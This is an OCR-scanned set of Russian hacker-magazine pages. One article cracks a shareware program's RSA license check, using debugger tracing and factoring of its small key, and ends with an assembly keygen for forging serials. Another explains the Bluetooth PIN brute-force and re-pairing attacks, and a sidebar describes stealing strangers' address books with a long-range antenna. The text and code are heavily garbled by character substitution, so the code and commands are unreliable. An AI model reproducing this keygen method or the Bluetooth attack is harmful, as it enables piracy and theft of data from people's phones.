Придется догадываться самим. Вариантов много, поэтому я просто 
запустил программу — проверить что будет. Однако прога запусти- 
лась с ошибкой, да и при нажатии на любую иконку она вылетает 
(там где раньше было сообщение о демоверсии). Понятно, код-то у 
нас неверный. Теперь можно запускать свои любимые отладчики и 
дизассемблеры. У меня это — ОІІуЭЬд и ЮА, в дальнейшем всю ра- 
боту будем проводить в них. Конечно, наш любимый ЭеОе тоже мо- 
жет помочь. Благо программа написана на ЭеІрГіі и ничем не пако- 
вана (достаточно редкий случай в наше время). 

Так как ошибка появляется после сплеш-формы и до открытия 
основного окна, то поставим в отладчике бряк на ТРогтІ . Рогт 
Сгеаіе. Адрес 0091 Е050 нам подскажет ОеЭе. Запустив прог- 
рамму под отладчиком и остановившись в нужном нам месте, 
немного потрейсим код до появления ошибки, попутно отмечая, 
что делает программа, но не вдаваясь в подробности. Кажется, 
что программа делает совершенно не нужные ей действия: 
считывает серийные номера дисков, дату и версию ВІ08, чита- 
ет наш введенный код из файла сІіескЗит.сІаі и даже проверя- 
ет наличие отладчика ЗоШсе. 



код, расшифровываемый во время выполнения 



0091 ЕВР6 6А 00 
0091 ЕВР8 68 80000000 
0091 ЕВРО 6А 03 
0091 ЕБРР 6А 00 
0091 ЕС01 6А 03 
0091 ЕСОЗ 68 000000С0 
0091ЕС08А1 18569300 
03:[935618] 

0091 ЕСОй 50 

0091 ЕС0Е Е8 1586ЕЕРР 

<ЭМР.&кегпе132.Сгеа1:еРМеА> 



РОЗНО 
РИЗН 80 
РИЗНЗ 
РИЗН о 
РИЗНЗ 
РИЗН 

МОѴ ЕАХ,0\А/0РЮ РТВ 
РІІЗН ЕАХ 

САН 



Что интересно, этот кусок кода расшифровывается во время вы- 
полнения программы, если посмотреть листинг в ЮА, то там бу- 
дет совершенно другой код. 

На рисунке в левой части находится код ДО запуска программы, 
в правой — ПОСЛЕ запуска. Разница очевидна. Значит, мы на 
верном пути, если автор решил эту часть скрыть. Поэтому при- 
дется запустить программу, чтобы раскриптовались все участки, 
и использовать функцию Эейе «Дампить активный процесс». От- 
метим, что ошибка вылетает при вызове процедуры по адресу 
91Р201: 

код, на котором вылетает ошибка 

0091 Р201 МОѴ ЕАХЮѴѴОРЮ РТР 35:[ЕВР-128] 

0091 Р207 САН ЗирегЗоІ.0091 ЭРЗО 

0091 Р20С МОѴ ЕСХЮѴѴОРО РТР 03:[9378Е8] 

0091 Р21 2 СМР ЕОХЮѴѴОРО РТР 03:[ЕСХ+4];\ 

0091 Р21 5 Л\І2 ЗНОРТ ЗирегЗоІ.0091 Р21 9; ключевые сравнения 
0091 Р21 7 СМР ЕАХЮѴѴОРО РТР 03:[ЕСХ]; / 

0091 Р21 9 Н ЗНОРТ ЗирегЗоІ.0091 Р220 

0091 Р21 В САН <ЗирегЗоІ.@ЗузІет@@НаІЮ$рргѵ (00Е4: С3)> 

0091 Е220 МОѴ ЕОХЮѴѴОРЭ РТР 33:[ЕВР-8] 

0091 Р223 МОѴ ЕАХ,0\Л/0РЮ РТВ 33:[ЕВР-4] 

0091 Р226 МОѴ ЕАХ,йѴѴ0В0 РТВ 03:[ЕАХ+628] 

0091 Р22С САП ЗирегЗоІ.0092Е640 
0091 Р231 МР ЗНОВТ ЗирегЗоІ.0091 Р23й 

ЖЕЛЕЗНЫЙ БРЯК 

В ЕАХ лежит указатель на наш введенный неправильный код. Ес- 
ли посмотреть чуть ниже, станет очевидно, что программа нор- 
мально запустится, если успешно выполнить сравнения по адре- 
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ВЗЛОМ ///// І551ІЕ 



ЧТО ТЛКОБ^8А_ЩЩЦ 

Немного теории. Алгоритм ВБА носит такое название 
благодаря своим создателям, по первым буквам их фа- 
милий — Кіѵезі:, 8Ьатіг, АсИетап. В настоящее время 
это один из самых популярных несимметричных крип- 
тоалгоритмов. Ключи шифрования вычисляются, как 
функции двух больших простых чисел, то есть чисел, 
делящихся только на себя и на единицу. Предполагает- 
ся, что восстановление исходного текста по шифроте- 
ксту и закрытому ключу эквивалентно разложению на 
множители двух больших чисел. Использование доста- 
точно больших чисел делает алгоритм надежным и 
криптостойким. Формирование открьиого и закрыто- 
го ключей описывается следующим алгоритмом: 

1 Фиксируются два простых числа р и ^ 

2 Вычисляется их произведение п=р*ц 

3 Выбирается число е, меньшее п, являющееся взаим- 
но простым с числом (р-1)(д-1) 

4 По методу Евклида подбираются целые числа сі и у, 
удовлетворяющие уравнению е*сі-1=(р-1)(д-1)*у 

5 Пара чисел (е,п) — это открытый ключ, которым 
шифруется текст 

6 Число сі — закрытый ключ, он храниться в секрете; 
с его помощью читаются все сообщения. 

При шифровании исходный текст рассматривается как 
числовой ряд, и над каждым его числом совершается 
операция С(і)=(М[і] Л е) той и. 

Более подробно про алгоритм К8А, а также многих 
других можно прочитать в книге известного специа- 
листа в криптографической науке Брюса Шнайера 
«Прикладная криптография», переведенной на рус- 
ский язык. 

А мы пока разберем работу алгоритма К8А на очень 
простом примере. Выберем р=3, <\=7 — два взаимно 
простых числа, правда, маленьких, но это нам нужно 
только для разбора работы алгоритма. Соответствен- 
но, и будет равно 21 (3*7). Установим е=5 — взаимно 
простое с результатом (3-1)*(7-1)=12. Тогда отыскать 
несколько пар (б, у) несложно: к примеру, (5,2) или 
(17,7). Мы для интереса возьмем вторую пару. 
Закрьпый ключ в этом случае будет числом 17, а отк- 
рытый — парой чисел ( 5 ,2 1 ) . 

Возьмем последовательность М={1,2,3,4,5} и зашиф- 
руем ее с помощью открытого ключа: 



С(1)=1 Л 5 той 21 = 1 
С(2)=2 Л 5 той 21 = И 
С(3)=3 Л 5 той 21 = 12 
С(4)=4 Л 5 той 21 = 16 
С(5)=5 Л 5 той 21 = 17 



Получилась последовательность С={ 1,1 1,12,16,17} . 
Это и есть криптотекст. Дешифрование проводится 
аналогично шифрованию, только при этом использу- 
ется закрьпый ключ. При использовании достаточно 
больших чисел достигается значительная криптостой- 
кость К8А. Единственный способ взлома этого алго- 




ритма (то есть нахождения закрьпого ключа) является 
так называемая Ьгине-іогсе атака, проще говоря, метод 
последовательного перебора. Однако сразу стоит заме- 
тить, что при достаточно больших (свыше 256 байт) 
выбранных числах этот перебор может затянуться на 
долгие -долгие годы. 




Дополнительную информацию 
об ВЗА и шифровании лучше 
всегда брать из классических 
трудов. Например, известной 
книги Брюса Шнайера. 



сам 91 Р21 2 и 91 Р21 9. Скорее всего, 
это просто сравниваются два 64- 
битных числа. Ставим Иагбуѵаге 
Ьгеакроіпі на адрес 0091 Р201, так 
как обычный Ьгеакроіпі по Р2 поста- 
вить не получится — код-то распа- 
ковывается во время выполнения. Встречаются такие защиты, 
точнее методы противодействия отладки: обычный бряк — это не 
что иное, как команда іпІЗ, вставляемая по адресу устанавливае- 
мого бряка. При выполнении этой команды отладчик соответству- 
ющим образом ее обработает, заменит на оригинальную коман- 
ду и остановится — бряк сработает. В нашем же случае код рас- 
шифровывается динамически, то есть вставленная отладчиком 
команда іпІЗ будет просто затерта. 

Перезапустим теперь программу с установленным Иагбѵѵаге 
Ьгеакроіпі и после останова можем спокойно ставить бряк на ад- 
рес 0091 Р20С (следующая команда после найденной процедуры), 
чтобы посмотреть, что за числа сравнивает программа перед вы- 
ходом. Одним из тех двух чисел оказывается код ЭВМ, а второе, 
очевидно, декодируется из ответного кода. Не зря же он переда- 
ется в процедуру перед сравнением. Поэтому посмотрим на эту 
самую процедуру. При заходе в нее сразу бросаются в глаза 
строки 14162795658430266512815 и 188013097933370886974627. 



Первая мысль при их виде — ВЗА. Заглянув внутрь процедуры 
885А2С, все сомнения исчезли. Это старая добрая реализация 
В8А из какого-то популярного среди программистов-шароварщи- 
ков делфи-компонента. Описание алгоритма шифрования ВЗА 
приведено в соответствующей врезке, настоятельно рекомендую 
тебе ознакомиться с ним, так как это нужно для понимания того, о 
чем я буду говорить. А мы сейчас продолжим взлом программы. 
Прежде всего давай определимся с тем, какие инструменты для рабо- 
ты с алгоритмом ВЗА у нас есть? Мы будем использовать две утилиты 
— ВЗА-ТооІ и Відіпі Саісиіаіог Рго. Скачать их можно с сайта Шр://сгаск- 
ІаЬ.ги . Первая, кроме генерации больших простых чисел, открытых и 
закрытых ключей, шифрования и дешифрования, также может по из- 
вестному числу п раскладывать его на р и ц и вычислять б. Опять же 
напомню, что сроки вычисления (читай — подбора) зависят от длины 
используемых ключей. Вторая утилита производит математические 
операции с очень большими числами, а также имеет в своем составе 
модуль ВЗА. В нем мы будем проверять найденные решения. 

ВЫЧИСЛЕНИЕ ЛИЦЕНЗИОННОГО КОДА 

Для начала проверим работу В8А с помощью ВЗА-ТооІ (она позво- 
ляет работать с десятичными числами) на примере от Брюса Шнайе- 
ра: п=3337, р=47, ц=71, е=79, 6=1019. Сперва введем п, жмем Ехасі 
зіге. Получим размер ключа — 12 бит, введем его в поле КеуЗіге. 
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Для нахождения р и ц факторизуем п (Расіог І\І). Получим 47 и 71. 
Для нахождения сі надо ввести выбранную е в шестнадцатеричном 
виде и нажать Саіс О. 6=1019 — все точно, как в примере. Вернемся 
к нашей программе. Сперва разберемся, что за строки 
14162795658430266512815 и 188013097933370886974627? Мы уже 
разобрались, что открытый ключ должен состоять из двух чисел — 
п и е. Какое же из этих двух чисел п, а какое — е? ВЗА-ТооІ нам все 
расскажет, к тому уже числа довольно маленькие (для криптостойко- 
го ВЗА). Для начала можно попробовать факторизовать первое чис- 
ло (все, как в примере). Не вышло? Пробуем второе. А второе прек- 
расно разложилось на два сомножителя. Следовательно, первое 
число — это е. Размер ключа — 78 бит, значит, у нас ВЗА-78. 

Надо в поле Е ввести первое число, не забыв перевести его в 
шестнадцатеричный вид. Нажав Саіс О, мы находим недостаю- 
щее число — 1 113439. Здесь необходимо отметить, что на самом 
деле получилось все наоборот: нам было заранее известно чис- 
ло 6, а находили мы е. Дело в том, что, с математической точки 
зрения, числа 6 и е равнозначны, то есть можно шифровать с по- 
мощью 6, расшифровывать — с помощью е, и наоборот. Практи- 
ческой разницы выбор числа для шифрования не имеет. 

Что мы получили в итоге и для чего все это было изучено и про- 
делано? Получается, что программа декодирует введенный от- 
ветный код по алгоритму ВЗА, а значит, для получения правиль- 
ного кода нужно закодировать «код ЭВМ». Но есть небольшая 
деталь — этому делфи-компоненту нужно, чтобы первый байт де- 
кодированного числа был 07, тогда он отбрасывается и получа- 
ется нужное число. Такой уж странный замысел был у его разра- 
ботчиков. Значит, алгоритм наших дальнейших действий такой: 

1 Преобразовать «код ЭВМ» в шестнадцатеричную систему 

2 Добавить в начало 07. 

3 Сделать ВЗА_ЕпСгурІ 

4 Преобразовать результат в десятичную систему. 

Для вычислений воспользуемся калькулятором Відіпі Саісиіаіог, 
точнее его модулем ВЗАТооІ. Переведем все найденные числа в 
шестнадцатеричную систему и введем в соответствующие окна 
ВЗАТооІ. Остается ввести «код ЭВМ» в шестнадцатеричном виде с 
добавленным «07» в окошко ЕпсгурІ&Эесгурі іезі и нажать Епсгурі. 
Получим наш серийный номер. Переводим его в десятичный вид, 
вводим в гедст.ехе, и программа запускается без вопросов. 

ПИШЕМ КЕЙГЕН 

Написание кейгена для ВЗА может показаться делом чрезвычай- 
но трудным, однако это не совсем так. Есть много готовых библи- 
отек для работы с большими числами, например, библиотека 
ЬідІіЬ ѵ. 0.01 е Ьу гоуІІІеиг. Ее мы и будем использовать. Писать бу- 
дем, конечно, на ассемблере, используя практически любой его 
компилятор. Вот основная часть нашего кейгена: 



использование ВЗАТооІ 



программа Відіпі помогла 
нам с вычислениями 



іпѵоке _ВідСгеаІе,0 
тоѵ Ьід_т,еах 

іпѵоке _ВідІп,асісіг І\І,10іі,Ьід_п 
іпѵоке _ВідІп,асісіг Е,10іі,Ьід_е 
тоѵ еах.оіізеі $Ю 
тоѵ есІх,оІІзеІ зТтр 

саІІ зІг2іпШ4 ; конвертируем в 64-битное число, взято из 
йеірііі 
Ьзѵѵар еах 
Ьзѵѵар есіх 

тоѵ сіѵѵогсі ріг [М],есІх 

тоѵ сіѵѵогсі ріг [М+4],еах 

тоѵ есМ,оТТзе1; М формирование М 

хог еах, еах 

тоѵ есх,8 

герг зсазЬ 

асісі есІі,-2 

тоѵ Ьуіе ріг [ебі],7 

іпѵоке _ВідІпВу1:ез,оТТзе1: М,8,256,Ьід_т 
іпѵоке _ВідРоѵѵМосІ,Ьід_т,Ьід_е,Ьід_п,Ьід_с кодирование 
іпѵоке _ВідОіЛ,Ьід_с,Ю,асІсІг зЗегіаІ Преобразование в 10- 
чную строку 

іпѵоке _ВідОезІгоу,Ьід_п Деинициализация 
іпѵоке _ВідОезІгоу,Ьід_е 
іпѵоке _ВідОезІгоу,Ьід_с 
іпѵоке _ВідОезІгоу,Ьід_т 
іпѵоке ЗеЮІдІІетТехІ,ЬѴѴіп,1003,асісіг зЗегіаІ 
.еізе 

іпѵоке ЗеЮІдІІетТехІ,ЬѴѴіп,1003,асісіг зЗЬогШате 
.епбіі 
геі 



КдРгос епсір 

Основа кейгена готова, интерфейс и оформление добавишь сам. 



код нашего кейгена 
.баіа 

ЕсІЬ "10Р05Р",0 

N66 "270035Е00250С4РЗЕСАЗ",0 
.собе 

КдРгос ргос ііѴѴіп:Н\Л/І\Ю 
І_0САІ_ Ьід_п: 0ѴѴ0ЕЮ 
І_0САІ_ Ьід_е: ЭШРЮ 
І_0САІ_ Ьід_с: 0ѴѴ0РЮ 
І_0САІ_ Ьід_т: 0ѴѴ0РЮ 

іпѵоке 6еЮІдІІетТехІ,ЬѴѴіп,1002,аббг зЮ,20Ь 
.іі еах 

іпѵоке ЕШ2егоМетогу,аббг зЗегіаІ, зігеоТ М+зігеоІ зЗегіаІ 

іпѵоке _ВідСгеаІе,0 Инициализация 

тоѵ Ьід_п,еах 

іпѵоке _ВідСгеаІе,0 

тоѵ Ьід_е,еах 

іпѵоке _ВідСгеаІе,0 

тоѵ Ьід_с,еах 



ЗАКЛЮЧЕНИЕ 

Необходимо отметить, что нам удалось написание кейгена для этой 
программы благодаря ошибкам автора при выборе ключей, точнее 
их длин. При выборе достаточно больших ключей взлом бы затянул- 
ся на несколько лет. Хотя нет, не взлом, а поиск верного серийного 
номера. Всегда же есть другие способы взлома, например, патч тех 
переходов, перед которыми сравниваются два 64-битных числа (ад- 
рес 0091 Р20С, к примеру). Или подстановка нужных значений в 
сравниваемые регистры. Возможность патча проверь сам, думает- 
ся, что там не все будет так просто. 

К тому же наука не стоит на месте: математики и криптографы пос- 
тоянно ведут работу по изучению стойкости криптоалгоритмов. Бы- 
ло, к примеру, выявлена некоторая закономерность в распределе- 
нии простых чисел. Замечено, что простые числа располагаются на 
числовой оси своего рода скоплениями, что может немного облег- 
чить их поиск. Но пока алгоритм ВЗА остается одним из самых стой- 
ких алгоритмов шифрования. 

ВІЫАВУ ѴОІЖ’5 ~1Г 

На нашем диске Степ выложил массу документов, посвященных крип- 
тографии. все упомянутые в статье утилиты и программы, включая ло- 
маемую тѵлзѵ для обсчета электрических цепей и исходники кейгена. 
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УДОБНЫЙ РЮКЗАК, ЧТОБЫ ТАСКАТЬ НОУТ 



ВЗЛОМ 




1 .5 КГ. МОЗГОВ, ЧТОБЫ БЫСТРО ДУМАТЬ 



МОЩНАЯ 

ВЫСОКОЧАСТОТНАЯ АНТЕННА, ЧТОБЫ 
ДАЛЕКО БИТЬ 



На нашем диске ты найдешь полные версии программ, описанных 



ОПТИЧЕСКИЙ ПРИЦЕЛ, ЧТОБЫ ЛУЧШЕ 
ВИДЕТЬ ЖЕРТВУ 



в этой статье, а также полную подборку документации о багах ЫиеіооШ. 
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ТЕХТ АЛЕКСАНДР ЛЮБИМОВ АКА ЗАЗНІКЗ / ПЕАІ__ЗЗНХ@МАІІ_.КІІ / 




ЗЦРЕРЗЫІРЕР 

РАЗБИРАЕМСЯ В КРИТИЧЕСКОЙ УЯЗВИМОСТИ ПРОТОКОЛА ВТ 



ііЯ НЕ СТАНУ ВЕЛИЧАЙШИМ МЫСЛИТЕЛЕМ СОВРЕМЕННОСТИ, ЕСЛИ СКАЖУ 
ЧТО ВТ СЕЙЧАС ПРИОБРЕЛ СУМАСШЕДШУЮ ПОПУЛЯРНОСТЬ: БЛЮТУС-МОДУ- 
ЛЯМИ ОБОРУДОВАНО БУКВАЛЬНО ВСЕ: ОТ ТЕЛЕФОНОВ И ДО ПРИНТЕРОВ 
С НОУТБУКАМИ; ПО УЛИЦАМ ГОНЯЮТ ТОЛПЫ РАДОСТНЫХ БЛЮДЖЕКЕРОВ; КУ- 
ЧА ЛЮДЕЙ В МГНОВЕНИЕ ОКА ОБМЕНИВАЮТСЯ КОНТАКТАМИ И ЗАПИСЯМИ 
СО СВОИХ ТЕЛЕФОНОВ. КАЗАЛОСЬ БЫ, ВСЕ ДОВОЛЬНЫ И НИКТО НЕ ЖАЛУЕТ- 
СЯ. ОДНАКО С КАЖДЫМ ДНЕМ НАКАПЛИВАЕТСЯ ВСЕ БОЛЬШЕ И БОЛЬШЕ ВОП- 
РОСОВ ОТНОСИТЕЛЬНО БЕЗОПАСНОСТИ ЭТОГО ПРОТОКОЛА. МЫ УЖЕ ПИСА- 
ЛИ ОБ ОСНОВНЫХ БАГАХ ВШЕТООТН, А СЕГОДНЯ РАССКАЖЕМ О НОВОЙ МЕ- 
ТОДИКЕ ВЗЛОМА, КОТОРУЮ РАЗРАБОТАЛИ ДВА ВЕСЕЛЫХ ИЗРАИЛЬТЯНИНА** 



ПОВЕСТЬ О ГОЛУБЫХ ЗУБАХ 

Возможно, в этом место статьи стоило выразить свое негодова- 
ние: дырка в таком популярном протоколе! Оболтусы и негодяи 
эти скандинавы, разработчики ЫиеІооіЫ Но, я думаю, будет луч- 
ше отправить всю критику и недовольные возгласы относитель- 
но ВТ-баги аккуратно в топку и, собственно, приступить к делу. 
А дело в том, что в мае этого года Авиша Вул и Янив Шакед 
(АѵізИаі ѴѴооІ, Ѵапіѵ ЗИакесІ) — сотрудники Тель-Авивского уни- 
верситета опубликовали в Интернете подробное описание атаки 
на блютус-устройства. Материал наделал довольно много шума 
(ты, наверное, слышал о нем, да?), и это не зря. Суть нападения 
заключается в том, что хакер может похитить РІЫ-код во время 
процесса паринга (раігіпд) двух девайсов. Эта процедура взлома 
довольно сложная и включает в себя несколько этапов, среди 
которых самым важными является сбор пакетов данных и их ана- 
лиз с последующей расшифровкой. Скажу тебе сразу, что ма- 
териал своеобразный. Для того чтобы его правильно понять, 
нужно немного поразмыслить и подключить фантазию. 

Сам процесс атаки тесно связан с механизмом аутенти- 
фикации и созданием ключа-шифра между двумя уст- 
ройствами, поэтому перед тем как мы перейдем не- 
посредственно ко взлому РІЫ'а, давай поглядим, 
какую последовательность действий соверша- 
ют устройства, желающие соединиться. 



НАЧАЛО НАЧАЛ — РАІКШС 

Паринг — это процесс, в котором два (или более) девайса свя- 
зываются для создания общей для всех устройств секретной ве- 
личины К іпі1 , которая потом используется в дальнейшем обще- 
нии этих Ыиеіооііі-устройств. Сразу оговорюсь, что по ходу текс- 
та я буду иногда называть паринг «сопряжением» — это синони- 
мы, чтобы ты знал. В некоторых официальных доках по ВТ мож- 
но даже встретить смешной перевод («подгонка пары»), поэто- 
му, я думаю, что никто не уличит нас в безграмотности. 

Процесс установки связи называется инициализацией, 
и в ЫиеіооіН ее принято делить на три шага: 

1 Создание ключа инициализации (тот самый К іпі1 ) 

2 Создание ключа связи (в официальной документации 
называется Ііпк кеу и обозначается, как К аЬ ) 

3 Аутентификация 

Перед тем как устройства начнут «спариваться» (люди, о чем 
я тут пишу? :)), на обеих сторонах нужно ввести специальный 
РІЫ-код. Обычно, если два человека хотят связать, допустим, 
свои телефоны, они заранее договариваются о том, какой будет 
РІІХІ. В будущем соединяющиеся устройства мы будем называть 
весьма красноречиво — А и В; кроме того, одно устройство при 
паринге становится главным (Мазіег), а другое — ведомым 
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общий план атаки. Вычисляем 
потенциальный Кіпіі, КаЬ и ЗВЕЗ 
по мнимому РІІ\Г. Правда, несложно? 



(ЗІаѵѳ). Будем считать, что устрой- 
ство А — главное, а В — ведомое. 
Это нам пригодится, чтобы не пу- 
таться и адекватно воспринимать 
приводимые схемы. Сразу после того, как пользователи ввели 
РІКІ-коды, начинается создание ключа К іпі1 . К іпі1 формируется по 
алгоритму Е22, который оперирует такими величинами: 




Узнать ВР АРРВ-ѵстройства очень просто. Для этого есть 
стандартная процедура опроса (іпаиігѵ). Поэтому адреса 
устройств А и В — не секрет для хакера 



К іпі! . Вся процедура достаточно подробно описана на схеме. 
После того как девайсы уже обменялись поксоренными слова- 
ми, начинается вычисление ключа по методу Е21. Вот что необ- 
ходимо для К аЬ -ключа: 

1 ВЭ_АЭОР (это мы уже проходили) 

2 128-битный І_К_ВАІ\Ю (каждое устройство хранит свое 
и полученное от другого девайса значение) 

// На это месте раігіпд ЗАКАНЧИВАЕТСЯ 

После длительных потуг Ііпк кеу все-таки создается, и это зна- 
чит, что сам паринг успешно завершен, и начинается последний 
этап инициализации ЫиеіооіН — совместная аутентификация, 
или Миіиаі аиДіепйсаііоп. Процесс основан на довольно любо- 
пытной схеме «запрос-ответ». Но одна из железок становится 
верификатором (то есть «проверяющим»), генерирует случай- 
ное слово АІІ_ВАІ\Ю(А) и в ріаіп Іехі засылает его соседнему уст- 
ройству, кратко называемому предъявителем (сіаітапі — в ори- 
гинальной документации). Как только устройство-предъявитель 
получает это «слово», начинается вычисление величины ЗВЕЗ с 
применением алгоритма Е1, и она отправляется верификатору. 
Соседний девайс производит аналогичные вычисления и прове- 
ряет ответ предъявителя. Если ЗВЕЗ'ы совпали, то, значит, все 
ОК, и теперь девайсы меняются ролями, так что процесс повто- 
ряется заново. Сам же ЗВЕЗ вычисляется по Е1 -алгоритму, кото- 
рый оперирует такими величинами: 

1 Случайно созданное АІІ_ВАІ\Ю 

2 Ііпк кеу К аЬ 

3 Свой собственный ЕЮ_АООВ 



1 ЕЮ_АОЭВ — уникальный адрес ВТ-устройства длиной 48 бит 
(то же самое, что и МАС-адрес у обычной сетевухи) 

2 РІІ\І и его длина 

3 Случайное 128-битное число ІЫ_ВАІ\Ю 

На выходе, после работы Е22 алгоритма, получаем 128- битное 
слово, которое гордо именуется К іпі1 . Стоит подчеркнуть, что 
число ІІ\І_ВАІ\Ю отсылается устройством А в чистом виде, то есть 
ни о каком шифровании речи еще не идет. Если РІЫ-код устрой- 
ства неизменяем, то при формировании ключа инициализации 
(К іпі1 ) используется ВЭ_АЭЭВ второго устройства. Когда у обоих 
девайсов пины разные, будет использован ВО_АООВ(В). Первый 
шаг паринга пройден, а за ним следует создание Ііпк кеу К аЬ . Как 
только он будет сформирован, ключ К іпі1 отбрасывается и боль- 
ше не используется. 

Плавно переходим к созданию ключа связи (Ііпк кеу), который в 
простонародье называют К аЬ . Для этого нехитрого дела желез- 
ки пересылают друг другу 128-битные слова І_К_ВАІ\Ю(А) и 
І_К_ВАІ\Ю(В), которые генерируются случайным образом и обме- 
ниваются ими после побитового ХОР'а ключом инициализации 



Представить в голове такой процесс довольно муторно, но туман 
рассеется, как только ты взглянешь на схему. Все, с инициали- 
зацией разобрались, идем дальше. 

ТНЕ ВА5ІС АТТАСК 

Как происходит аутентификация мы уже разобрали. Самое вре- 
мя проанализировать данные, которыми обменивались устрой- 
ства на протяжении всего процесса сопряжения: 



# 


Откуда 


Куда 


Данные 


Длинна 


Вид 


1 


А 


В 


ІІ\І_ВАІ\Ю 


128 ЫІ 


ріаіпіехі 


2 


А 


В 


І_К_ВАІ\Ю(А) 


128 ЫІ 


ХОВеб ѵѵШэ 


3 


В 


А 


1_К_ПАІ\Ю(В) 


128 ЫІ 


ХОВеб ѵѵіДі 


4 


А 


В 


АІІ_ВАІ\Ю(А) 


128 ЫІ 


ріаіпіѳхі 


5 


В 


А 


ЗВЕЗ 


32 ЫІ 


ріаіпіехі 


6 


В 


А 


АІІ_ВАІ\Ю(В) 


128 ЫІ 


ріаіпіехі 


7 


А 


В 


ЗВЕЗ 


32 ЫІ 


ріаіпіѳхі 



Обладая этими сведениями, реально продумать и рассчитать те- 
оретический план атаки на ЫиеІооіИ-соединѳние, чтобы украсть 
РІІ\І. Представим, что негодяй хакер прослушал эфир и во время 



СИНИЙ СН АЙПЕР 

Как ты, наверное, уже наслышан, номинальный радиус работы устройств ВТ-ѵІ не превышает 15 метров. Эту циф- 
ру декларирует стандарт протокола, и расстояние нормальной работы редко превышает 10 метров. Хакерам показа- 
лась стремной идея ходить за «жертвой», подкрадываясь со спины и прячась за редкими кустиками, чтобы похитить 
из мобильного телефона нужную инфу. Поэтому на свет появился довольно интересный девайс — винтовка 
В1ие8пірег, разработанная Джонном Херинттоном ( \у\у\у . Дехіііз . сот ) . Конструкция представляет собой длинную ан- 
тенну, снабженную настоящим прицелом. Винтовка подключается к портативному устройству — ноутбуку/КПК. 
Это приспособление реально увеличивает эффективную дальность ЫиеноогЬ -устройств до 1,5 километров. Во всей 
Сети уже с марта этого годя гуляет информация, что автор ВІиеЗпірег, находясь в высотном здании Лос-Анджелес- 
кого отеля, направлял винтовку на прохожих и сливал с их телефонов адресные книги. 
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Стоит различать процесс сопряжения устройств (раігіпа) и аутен- 
тификации (аиіііепіісаііоп). Паринг нужен только для создания 
ключа связи, которым устройства будут пользоваться в дальней- 
шем, каждый раз передавая какие-либо данные. 




У некоторых устройств, например ВТ-гаонитѵр. бывает жестко 
прописан Фиксированный РІЫ — обычно строка «0000». 



паринга перехватил и сохранил все сообщения. Теперь мы по- 
дошли вплотную к главному вопросу. Собственно, сам взлом пи- 
на осуществляется подбором. 

Для начала нужно составить продвинутый алгоритм перебора, 
чтобы получить хоть какой-то результат. Вот смотри, мы перехва- 
тили ІЫ_ЯАІ\Ю (он нешифрованный) и ВО_АОЭРі (причем у обоих 
устройств адреса видны в эфире) и запускаем алгоритм Е22; ему 
передаются вышеперечисленные данные и наш «потенциаль- 
ный» РІІ\І. Мы находим предполагаемое значение К іпі1 , это выгля- 
дит примерно так: 



скорости. Наши израильские друзья совершили настоящий 
прорыв, найдя несколько способов сократить в разы время пе- 
ребора РІІ\І-кода. Подробно описывать предложенные ими 
улучшения у меня нет возможности, поясню лишь, что речь 
идет об адаптации базовых алгоритмов ВТ-стека, что и позво- 
лило уменьшить время, необходимое для взлома РІІ\І-кода. 
Но старая проблема никуда не делась: если взломщик опоздал 
и не успел захватить все пакеты с самого начала «спаривания» 
устройств, то у него ничего не получится. И эту проблему удач- 
ливые израильтяне благополучно решили. 



КТО БЫСТРЕЙ 

Понятно, что конкретные реализации 
описанного выше процесса могут рабо- 
тать с различной скоростью. Можно оп- 
тимизировать эти программы, исполь- 
зуя специальные настройки компилято- 
ра, можно переписывать по-разному 
циклы, условия и арифметические опе- 
рации, желая добиться максимальной 




К іпі1 = Е22[ІІ\І_ВАЩ В0_А00В(В), РІІ\Г] //РІІ\Г — предполагае- 
мый нами пин-код 



Идем дальше, смотри на таблицу выше: сообщения 2 и 3 поксо- 
рены К іпі1 'ом, который мы только что сгенерировали. Значит, сей- 
час мы получим І_К_ВАІ\Ю(А) и І_К_ЯАІ\Ю(В) в чистом виде. 
Собственно говоря, нам никто не мешает высчитать гипотетичес- 
кое значение К аЬ . Проделываем следующую операцию: 



І_К_К(А) = Е21 [ В 0_А0 О Р (А) , І_К_КАІ\Ю(А)] //І_К_К(АІВ) — 
это промежуточные величины 

І_К_К(В) = Е21 [В0_А0ЭВ(В), І_К_ВАЩВ)] // ХОВ им их между 
собой и получаем ключ связи 
К аЬ = І_К_К(А) ХОР І_К_К(В) 



Теперь самое время проверить наш «потенциальный» пин. Что- 
бы узнать, действительно ли он настоящий, мы берем свежеис- 
печенный КаЬ и перехваченный АІІ_ВАІ\Ю(А) и вычисляем значе- 
ние ЗВЕЗ(А). После этого сравниваем полученный результат с 
ЗВЕЗ(А)', который хранится в сообщении номер 5: 



ЗВЕЗ(А) = Е1 [АІІ_ВАІ\Ю(А), К аЬ , Вй_А00В(В)] 



Если ЗРЕЗ(А) == ЗВЕЗ(А) 1 — мы успешно угадали пин! Если же вы- 
шел облом, то начинаем производить всю последовательность 
действий заново, только теперь берем другой РІІ\Г. Вот такая вот 
хитрая методика получилась. Все вышеописанное, в принципе, не 
новость. Первым человеком, который за- 
метил эту брешь, если ее можно так наз- 
вать, был англичанин Олли Вайтхауз (ОІІіе 
ѴѴЬіІеЬоизе) еще в апреле 2004 года. Имен- 
но он догадался перехватить сообщения 
во время паринга и попытаться вычислить 
РІІ\І методом перебора с помощью полу- 
ченной идентификационной информации. 

Тем не менее метод, представленный 
Вайтхаузом, имел один достаточно весо- 
мый изъян: атаку можно было провести 
только в том случае, если хакер смог выло- 
вить все аутентификационные данные. То 
есть, если взломщик находился вне эфира 
во время начала паринга, то он пролетает 
как фанера над Парижем — первые паке- 
ты с данными уже отправлены и отловить 
их не представляется возможным. 



ПЕ-РАІШЫС АТТАСК 

Нашим друзьям Вулу и Шакеду удалось исправить недостаток тех- 
нологии взлома, которую предложил в свое время Вайтхауз, и раз- 
работать второй тип атаки. Если устройства начали процесс обме- 
на аутентификационными данными, то мы уже не можем перехва- 
тит все сообщения и составить алгоритм перебора пина, правиль- 
но? Наши израильские друзья смогли вручную «заставить» уст- 
ройства заново переинициализировать весь процесс паринга. 
Смотри, как только КаЬ-ключ создан, каждая ВТ-девайсина сохра- 
няет его для будущей связи со сопряженным устройством. Если 
вдруг в дальнейшем одно из устройств захочет связаться с сосед- 
ним, то им не придется заново проходить процесс паринга. Вторая 
атака, названная Ре-Раігіпд аііаск (переводится, как атака на пере- 
сопряжение), эксплуатирует протокол установления связи и зас- 
тавляет сопряженные устройства начать весь процесс паринга за- 
ново — отсюда и название. Это позволяет взломщику перехватить 
все необходимые сообщения в эфире и произвести основную ата- 
ку, принципы которой я уже описал чуть выше. 

